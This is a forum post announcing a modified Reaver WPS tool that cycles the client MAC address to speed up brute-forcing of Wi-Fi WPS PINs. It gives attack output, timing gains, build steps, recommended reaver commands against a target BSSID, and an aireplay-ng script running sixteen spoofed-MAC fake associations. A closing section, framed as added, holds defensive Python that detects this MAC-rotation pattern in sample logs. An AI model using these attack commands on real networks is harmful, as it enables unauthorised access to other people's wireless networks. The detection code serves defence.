ReaverWPS with MAC Changer 1.0

Modified version with MAC Address last character changer to speed up the attack

  1. Mr. Penguin
    REAVER WPS modified version with MAC Address last character changer to speed up the attack.
    Well, sometimes the AP will reject the "EAPOL Request" after a successful pin try. I made some tests with simultaneous reaver instances running with different MACs (the -m argument), and when one instance gets "WARNING: Receive timeout occurred", the other gets "Received identity request" and continues the cracking.

    The problem with this method is: the reaver tool doesn't support simultaneous instances (ok, I read the FAQ about it). If you run two reaver instances, for example, the two instances will try the same pin at the same time.

    So I made changes to the reaver source code. Look at the output:
    Code:
    [+] Using MAC BC:99:47:B7:03:E9
    [+] Trying pin 00485678
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Using MAC BC:99:47:B7:03:E8
    [+] Trying pin 00495677
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Using MAC BC:99:47:B7:03:E7
    [+] Trying pin 00505673
    ...
    On the first try, reaver is using the client MAC "BC:99:47:B7:03:E9" (it is not a real MAC, I'm just using it for the example), on the second, "BC:99:47:B7:03:E8", on the third, "BC:99:47:B7:03:E7". Well, after the use of the MAC "BC:99:47:B7:03:E0", reaver will start again at "BC:99:47:B7:03:E9".

    The numbers:
    With this method: 13 seconds/pin
    Without this method: 31 seconds/pin
    How to install

    Extract the tarball
    Code:
    tar -xzvf reaver-1.4-mac-changer.tar.gz
    Install Required Libraries and Tools
    Code:
    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
    Build Reaver
    Code:
    cd reaver-1.4-mac-changer
    cd src
    ./configure
    make
    Install Reaver
    Code:
    sudo make install
    How to use

    Code:
    reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
    or
    Code:
    reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
    What I recommend:
    Code:
    reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
    To associate more effectively, I recommend using the aireplay-ng tool. Create an "associate.sh" file, and put this inside:
    Code:
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZF &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZE &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZD &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZC &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZB &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZA &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z9 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z8 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z7 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z6 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z5 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z4 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z3 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z2 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z1 &
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &
    PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC (without the last digit).

    Before using reaver tool, just type "sh associate.sh". To kill all the aireplay-ng, type "killall aireplay-ng".

    If you have success using this method, please share with us to improve reaver WPS more and more.
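From the defender's side, the MAC rotation described in the post leaves a recognisable trace: a run of station MACs that differ only in their last hex digit, each starting a WPS exchange with the same BSSID a few seconds apart. The following is an added example, not part of the post or of reaver, that flags that pattern in constructed sensor-style log lines; the log format, field names and thresholds are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not a real capture): one line per WPS M1 message seen by a
# wireless sensor. The format and field names are assumptions made for this example.
SAMPLE_LOG = """\
2013-05-01T10:00:00 sta=BC:99:47:B7:03:E9 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
2013-05-01T10:00:13 sta=BC:99:47:B7:03:E8 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
2013-05-01T10:00:26 sta=BC:99:47:B7:03:E7 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
2013-05-01T10:00:39 sta=BC:99:47:B7:03:E6 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
2013-05-01T10:00:52 sta=BC:99:47:B7:03:E5 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
2013-05-01T10:01:05 sta=00:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
2013-05-01T10:05:00 sta=BC:99:47:B7:03:E4 bssid=AA:BB:CC:DD:EE:FF event=wps_m1
"""

LINE_RE = re.compile(r"(?P<ts>\S+) sta=(?P<sta>[0-9A-Fa-f:]{17}) "
                     r"bssid=(?P<bssid>[0-9A-Fa-f:]{17}) event=(?P<event>\w+)")

def parse_events(text):
    """Return (timestamp, station MAC, BSSID, event) tuples for well-formed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["sta"].upper(),
                           m["bssid"].upper(), m["event"]))
    return events

def find_mac_rotation(events, window_s=120, min_variants=4):
    """Flag (BSSID, station prefix) pairs where at least min_variants stations that
    differ only in the last hex digit sent WPS M1 within window_s seconds."""
    groups = defaultdict(list)
    for ts, sta, bssid, event in events:
        if event == "wps_m1":
            groups[(bssid, sta[:-1])].append((ts, sta[-1]))
    alerts = []
    for (bssid, prefix), hits in groups.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):          # sliding time window over the hits
            while (hits[end][0] - hits[start][0]).total_seconds() > window_s:
                start += 1
            nibbles = {n for _, n in hits[start:end + 1]}
            if len(nibbles) >= min_variants:
                alerts.append({"bssid": bssid, "prefix": prefix + "?",
                               "variants": sorted(nibbles), "first": hits[start][0]})
                break                          # one alert per group is enough
    return alerts
```

A legitimate client keeps one MAC for a session, so a burst of near-identical station addresses against one BSSID is a reasonable trigger to rate-limit or disable WPS on that AP.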